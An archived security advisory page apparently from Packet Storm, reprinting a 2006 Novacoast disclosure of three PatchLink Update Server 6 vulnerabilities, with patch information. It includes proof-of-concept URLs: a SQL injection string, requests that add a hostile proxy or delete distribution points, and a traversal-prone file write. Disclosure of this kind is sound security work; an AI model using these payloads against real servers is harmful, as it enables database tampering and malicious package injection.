exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

patchlink6.txt

patchlink6.txt
Posted Jul 2, 2006
Authored by Chris Steipp

PatchLink Update Server 6 is susceptible to a SQL injection vulnerability.

tags | exploit, sql injection
SHA-256 | a9562f75995902c038a402621f56c40b5a748c4ef10be8a5af997407f9d6ec0e

patchlink6.txt

Change Mirror Download

-------------------------------------------------------------
PatchLink Update Server 6 SQL Injection
-------------------------------------------------------------
Severity: Critical
Date: June 28, 2006
Class: Remote
Status: Patch Available
Discovered by: Chris Steipp, Novacoast (csteipp at novacoast dot com)
-------------------------------------------------------------

Synopsis
=====
Novacoast has discovered a vulnerability in the PatchLink Update
Server
(PLUS). This could allow the attacker to execute sql statements in the
PatchLink database as DBO.

Background
======

PatchLink Update* is the core product of the leading patch and
vulnerability
management solution for medium and large enterprise networks.

Discussion
======

There is an SQL injection vulnerability in the checkprofile.asp script.
This
unauthenticated script uses posted variables in an SQL call, which can
be
exploited.

An unchecked, posted variable (agentid) is used to create an SQL
statement.
The statement is run as “PLUS ANONYMOUS” (who is a member of PLUS
ADMINS, and
the PLUS ADMINS group is dbo on the PLUS database) was the inserting
user.
Thus the database can be manipulated as DBO via this attack.

Affected Version
=========

PatchLink Update Server 6.2.0.189, 6.2.0.181, 6.1
Novell ZENworks Patch Management 6.2. SR1

Exploit
====

None required.

The example exploit given here will write the string “something”
into the
ReportErrors table:


http://plus.company.org/dagent/checkprofile.asp?agentid=11111';%20INSERT
%20INTO%20ReportErrors%20(ReportError_Description)%20VALUES%20
('something')--

Recommended Solution
=============

Apply Vendor Patch
PatchLink:
PatchLink Update Server (PLUS) for 6.2 SR1 P1
PatchLink Update Server (PLUS) for 6.1 P1
Novell:

http://support.novell.com/cgi-bin/search/searchtid.cgi?10100709.htm

Disclaimer
======
Novacoast accepts no liability or responsibility for the
content of this report, or for the consequences of any
actions taken on the basis of the information provided
within. Dissemination of this information is granted
provided it is presented in its entirety. Modifications
may not be made without the explicit permission of
Novacoast.




-------------------------------------------------------------
PatchLink Update Server 6 PDP Anonymous Access
-------------------------------------------------------------
Severity: Medium
Date: June 28, 2006
Class: Remote
Status: Patch Available
Discovered by: Chris Steipp, Novacoast (csteipp at novacoast dot com)
-------------------------------------------------------------

Synopsis
=====

Novacoast has discovered a vulnerability in the PatchLink Update
Server
(PLUS) Distribution Point Server Listing for PatchLink's FastPatch
application. Exploitation of this vulnerability could allow the
attacker to
proxy requests by PatchLink Update Agents for patches, and thus
possibly
inject arbitrary packages into the PatchLink environment.

Background
======

PatchLink Update* is the core product of the leading patch and
vulnerability
management solution for medium and large enterprise networks.

PatchLink Distribution Point and FastPatch technology provide
intelligent
distribution across the entire enterprise minimizing deployment speeds
and
bandwidth utilization across the wide area network.

Discussion
======

The asp page “proxyreg.asp” does not properly authenticate
credentials when
accessed. The “proxyreg.asp” page appears to be used by the
PatchLink
FastPatch software, which allows roaming PatchLink agents to identify
proxy
servers on their network and connect to the closest or fastest
PatchLink
Distribution Point (PDP) automatically. The asp page returns a list of
PDP
servers in the organizations environment. An unauthenticated user can
list,
add, and remove PDP servers from this list.

This vulnerability would only affect organizations that use the
FastPatch
add-on product. Organizations that use SSL to protect their
agent-to-PLUS
communication will be unaffected by this attack.

Affected Version
=========

PatchLink Update Server 6.2.0.189, 6.2.0.181, 6.1
Novell ZENworks Patch Management 6.2. SR1

Exploit
====

None required.

1) To list all Proxy servers use:

http://plus.company.org/dagent/proxyreg.asp?List=

Use username/password of null/null for authentication.

2) To add a new Proxy server, use:

http://plus.company.org/dagent/proxyreg.asp?Proxy=www.hostileproxy.com:1337

3) To delete a Proxy server, use:

http://plus.company.org/dagent/proxyreg.asp?Delete=pdp1.company.org


Recommended Solution
=============

1) Apply Vendor Patch
PatchLink:
PatchLink Update Server (PLUS) for 6.2 SR1 P1
PatchLink Update Server (PLUS) for 6.1 P1
Novell:

http://support.novell.com/cgi-bin/search/searchtid.cgi?10100709.htm

2) Workaround
Deploy SSL certificate authentication to secure traffic between
agents
and PLUS.


Disclaimer
======
Novacoast accepts no liability or responsibility for the
content of this report, or for the consequences of any
actions taken on the basis of the information provided
within. Dissemination of this information is granted
provided it is presented in its entirety. Modifications
may not be made without the explicit permission of
Novacoast.




-------------------------------------------------------------
PatchLink Update Server 6 File Overwrite
-------------------------------------------------------------
Severity: Medium
Date: June 28, 2006
Class: Remote
Status: Patch Available
Discovered by: Chris Steipp, Novacoast (csteipp at novacoast dot com)
-------------------------------------------------------------

Synopsis
=====
Novacoast has discovered a vulnerability in the PatchLink Update
Server
(PLUS). This could allow the attacker to write or overwrite files on
the
PLUS filesystem.

Background
======

PatchLink Update* is the core product of the leading patch and
vulnerability
management solution for medium and large enterprise networks.

Discussion
======

The application “nwupload.asp” allows unauthenticated connections,
and
performs file writes for the requester as the user “PLUS ANONYMOUS”
(who is
a member of "PLUS ADMINS" Windows group by default). No validation
checks
are performed to prevent directory traversal.

The application nwupload.asp writes a file into directories defined by
variables passed to the page, appended to a registry key value. By
default,
on a Windows 2003 server, the registry key points to:
“C:\Program Files\Patchlink\Update Server\Storage”. Since
directory
traversals are not checked for, it is possible to write to any folder
on the
PLUS that PLUS ANONYMOUS (or thus, the PLUS ADMINS group) has access
to.

Affected Version
=========

PatchLink Update Server 6.2.0.189, 6.2.0.181, 6.1
Novell ZENworks Patch Management 6.2. SR1

Exploit
====

None required.

1) An attacker can run:

http://plus.company.org/dagent/nwupload.asp?action=one&agentid=two&data=
thisiscool&index=1

This will first delete the folder at:
{regkey for storage directory}\one\two

then create the directory:
{regkey for storage directory}\one\two

then write the file:
{regkey for storage directory}\one\two\1.txt

The file 1.txt will have the contents of the "data" variable.

Recommended Solution
=============

Apply Vendor Patch
PatchLink:
PatchLink Update Server (PLUS) for 6.2 SR1 P1
PatchLink Update Server (PLUS) for 6.1 P1
Novell:

http://support.novell.com/cgi-bin/search/searchtid.cgi?10100709.htm

Disclaimer
======
Novacoast accepts no liability or responsibility for the
content of this report, or for the consequences of any
actions taken on the basis of the information provided
within. Dissemination of this information is granted
provided it is presented in its entirety. Modifications
may not be made without the explicit permission of
Novacoast.

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close